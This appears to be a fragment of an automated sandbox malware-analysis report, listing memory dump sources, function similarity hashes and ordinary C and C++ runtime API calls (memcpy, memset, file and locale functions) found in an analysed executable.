                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: fclose$fseek$freadfreeftellmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3246642831-0
                                                                                                                                                                          • Opcode ID: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
                                                                                                                                                                          • Instruction ID: 416b80cbf64b420f1919e22f4eef723abe22cc306766f85ccbba00509272b07d
                                                                                                                                                                          • Opcode Fuzzy Hash: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
                                                                                                                                                                          • Instruction Fuzzy Hash: E2315223B29792C1FA95AB5AB48833827A0EF49FD4F586070DD4E83795DE3DE4814700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
                                                                                                                                                                          • Instruction ID: 20670ed91315f064d9bb1100e1b20ddfae791660d9e8eaa5d0799896b72bea3b
                                                                                                                                                                          • Opcode Fuzzy Hash: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 0151E132626B81C6EB55EF21E48427873A4FB44F84F185A35CE4D87754DF38E590CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memchr$freemallocmemcpy
                                                                                                                                                                          • String ID: Window$]
                                                                                                                                                                          • API String ID: 96147131-2892678728
                                                                                                                                                                          • Opcode ID: ed5b8489ed22b8da763a8917eea3fd69fa1d5401eec8b2c99788c0df10efc556
                                                                                                                                                                          • Instruction ID: 59d5b494c4193041e36c946bced6c8f2eba7d074cf24878fdebd83ee591a69d5
                                                                                                                                                                          • Opcode Fuzzy Hash: ed5b8489ed22b8da763a8917eea3fd69fa1d5401eec8b2c99788c0df10efc556
                                                                                                                                                                          • Instruction Fuzzy Hash: E351E323B38785C1EB61AB1695983F9A791AB49FD4F484171DE4DC7B88DE7CE482CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: 49f85d3e600eb9579d3aad7794df8eb1d36ad54acc32a5e73e93981ec5823baf
                                                                                                                                                                          • Instruction ID: 0fb09043021a34bcebe18a2b230c2d06d064da6d5c56a3b225f5ac2b0e178fd1
                                                                                                                                                                          • Opcode Fuzzy Hash: 49f85d3e600eb9579d3aad7794df8eb1d36ad54acc32a5e73e93981ec5823baf
                                                                                                                                                                          • Instruction Fuzzy Hash: B851BF23B18B82D2EA10EF21D5882782364FB55BA4F144632EF6C87796DF38E695D340
                                                                                                                                                                          APIs
                                                                                                                                                                          • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA13
                                                                                                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA66
                                                                                                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA8F
                                                                                                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AAB6
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AAFC
                                                                                                                                                                          • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AB03
                                                                                                                                                                          • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AB10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 729925803-0
                                                                                                                                                                          • Opcode ID: 100e41691c466b7234c52d2e698195f0e24465792a43b1836ef0097fc69b14f2
                                                                                                                                                                          • Instruction ID: 76d938c93de5530701014f2f77b93d46212c6cbe8942d030d3376f549d5fd4ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 100e41691c466b7234c52d2e698195f0e24465792a43b1836ef0097fc69b14f2
                                                                                                                                                                          • Instruction Fuzzy Hash: B5512033619A41C2EB609B19E5D8239ABA4EB85FE5F15C631CE5E87BA0CF3DD4428300
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0BD
                                                                                                                                                                          • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0D7
                                                                                                                                                                          • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B109
                                                                                                                                                                          • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B134
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00007FF67418B14D
                                                                                                                                                                          • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B16C
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B197
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 762505753-0
                                                                                                                                                                          • Opcode ID: 701487d62185e58df9b369bbef70d97be78819edea6edb368ed29a79d28ac0e2
                                                                                                                                                                          • Instruction ID: 6062b845e0b97149a15c6ac8e927197e9115a3a91f422e0722128c998b5cb93b
                                                                                                                                                                          • Opcode Fuzzy Hash: 701487d62185e58df9b369bbef70d97be78819edea6edb368ed29a79d28ac0e2
                                                                                                                                                                          • Instruction Fuzzy Hash: BF314167A18B81C5EA14EF11F8881797764FB88BA4F484631EA9E877A8DF3CE551C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: strstr
                                                                                                                                                                          • String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
                                                                                                                                                                          • API String ID: 1392478783-2972057365
                                                                                                                                                                          • Opcode ID: 95cbcc0c1e863908b271582b13f5326ad6ae6e9295d7071c4932028e7d2c7719
                                                                                                                                                                          • Instruction ID: 71307d8adb8c68fa8441a1db60be89e5d3f26a4f25bfc1a1ec5361805f6de02c
                                                                                                                                                                          • Opcode Fuzzy Hash: 95cbcc0c1e863908b271582b13f5326ad6ae6e9295d7071c4932028e7d2c7719
                                                                                                                                                                          • Instruction Fuzzy Hash: EE51DE33A28686C6DB21EF16E4885B8B7A1FB85B84F558175DE9D87354CF3CE581CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: 822a3280da562e4dce536d06efb3c8ccdb25b83d94d67819801b7ef5d77266b5
                                                                                                                                                                          • Instruction ID: 46c87718747d20e61b90d828156be32fd1d84017cc535ebab9e1d9620a3e42f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 822a3280da562e4dce536d06efb3c8ccdb25b83d94d67819801b7ef5d77266b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0641D3A3B29B45C4EE10EB16A4883B96355BB44FE4F144631EE6D8B786DE3CE141C300
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BFCA
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BFD9
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C00D
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C014
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C023
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418C04E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: bbed56a126e6f83f3b6848fe60efaaae478843fa5b6ea2493812493f378ec645
                                                                                                                                                                          • Instruction ID: f0c5ed1ad0aa8d95792c10fa6124de5030bb71b94c37f2d3535b69aafdcc2c9c
                                                                                                                                                                          • Opcode Fuzzy Hash: bbed56a126e6f83f3b6848fe60efaaae478843fa5b6ea2493812493f378ec645
                                                                                                                                                                          • Instruction Fuzzy Hash: E041D163B29745C5EE14FB12A4882B8A359AB44BE0F544632EE5D87BD6DF7CE081C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3189120677-0
                                                                                                                                                                          • Opcode ID: 417a59feedb8a99d28d0fbe5bdc5c86aeeb4b936b7126d3430bdbc5151953410
                                                                                                                                                                          • Instruction ID: d87c252d2b09f133f411159ca479f9cc363d8b02e1ce4d780b4c11febf5cd7fc
                                                                                                                                                                          • Opcode Fuzzy Hash: 417a59feedb8a99d28d0fbe5bdc5c86aeeb4b936b7126d3430bdbc5151953410
                                                                                                                                                                          • Instruction Fuzzy Hash: 5841D363B29B45C5EA10FB12A58837D6359AB45BE4F144631EE6D877D6DE3CD041C300
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF67418985C
                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF6741898F8
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF674189917
                                                                                                                                                                          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF67418997B
                                                                                                                                                                          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF674189984
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 915423947-0
                                                                                                                                                                          • Opcode ID: b1e84b6d6140a77035b949f7408225f05d33f3f205e7cc5b0ab3eaf0dc2f1b35
                                                                                                                                                                          • Instruction ID: aa1803dc0a715a9343a3c77ee62e7252f7acee776e87f7db6b27337bacc64f43
                                                                                                                                                                          • Opcode Fuzzy Hash: b1e84b6d6140a77035b949f7408225f05d33f3f205e7cc5b0ab3eaf0dc2f1b35
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F41D023B28B8AC5EB14AB65E4883B92354EB45BA4F144231EB2D47BD6DF3CE481C740
                                                                                                                                                                          APIs
                                                                                                                                                                          • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF674189D1A
                                                                                                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189D37
                                                                                                                                                                          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674189D60
                                                                                                                                                                          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF674189DAB
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0BD
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0D7
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B109
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B134
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: std::_Facet_Register.LIBCPMT ref: 00007FF67418B14D
                                                                                                                                                                            • Part of subcall function 00007FF67418B090: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B16C
                                                                                                                                                                          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF674189DC0
                                                                                                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189DD7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3911317180-0
                                                                                                                                                                          • Opcode ID: 6213a0e9a7a888f4411f4971676525eef9103ca148b99a3535e3b43de05aee0f
                                                                                                                                                                          • Instruction ID: 698c162264f7225caaf817b0b7db9058856d232fd270c4b39ede625660570c8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 6213a0e9a7a888f4411f4971676525eef9103ca148b99a3535e3b43de05aee0f
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E314D32629B85C2EB54EF25A48837977A8FB49F98F040135DA8D87B54DF3DD445C740
                                                                                                                                                                          APIs
                                                                                                                                                                          • __std_fs_code_page.MSVCPRT ref: 00007FF67417709F
                                                                                                                                                                            • Part of subcall function 00007FF67418D9A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF6741770A4), ref: 00007FF67418D9A4
                                                                                                                                                                            • Part of subcall function 00007FF67418D9A0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF6741770A4), ref: 00007FF67418D9B3
